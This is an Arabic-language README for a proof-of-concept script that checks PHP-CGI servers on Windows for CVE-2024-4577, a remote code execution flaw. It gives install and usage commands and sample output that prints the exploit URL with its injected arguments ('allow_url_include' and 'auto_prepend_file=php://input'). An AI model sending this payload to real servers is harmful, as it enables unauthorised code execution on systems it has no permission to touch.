
إثبات مفهوم لاستغلال ثغرة RCE خطيرة في PHP <8.2.15 (ويندوز)، مما يسمح للمهاجمين بتنفيذ أوامر عشوائية.
توجد ثغرة أمنية خطيرة في وضع CGI الخاص بـ PHP تسمح للمهاجمين بتشغيل أوامر عشوائية عن طريق التلاعب بمعاملات URL.
قبل تشغيل السكربت، تأكد من تثبيت Python 3 على نظامك. بالإضافة إلى ذلك، تحتاج مكتبة requests للتعامل مع طلبات HTTP.
يمكنك تثبيت التبعيات المطلوبة باستخدام pip. إذا لم يكن pip مثبتًا، اتبع التعليمات .
requests:pip install requests
للتحقق من عنوان URL مستهدف من ثغرة CVE-2024-4577، اتبع الخطوات التالية:
python3 exploit.py <target>
على سبيل المثال، لاختبار عنوان URL http://example.com، قم بتشغيل:
python3 exploit.py http://example.com
سيقوم السكربت باختبار عنوان URL المستهدف المقدم من أجل الثغرة وطباعة النتائج على وحدة التحكم. سيشير إلى ما إذا تم العثور على ثغرة محتملة أو لم يتم اكتشاف أي ثغرة.
(+) Potential vulnerability found at: http://example.com/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
(-) No vulnerability found at: http://example.com/php-cgi/php-cgi.exe?%ADd+allow_url_include
تم اكتشاف هذه الثغرة بواسطة Orange Tsai (@orange_8361)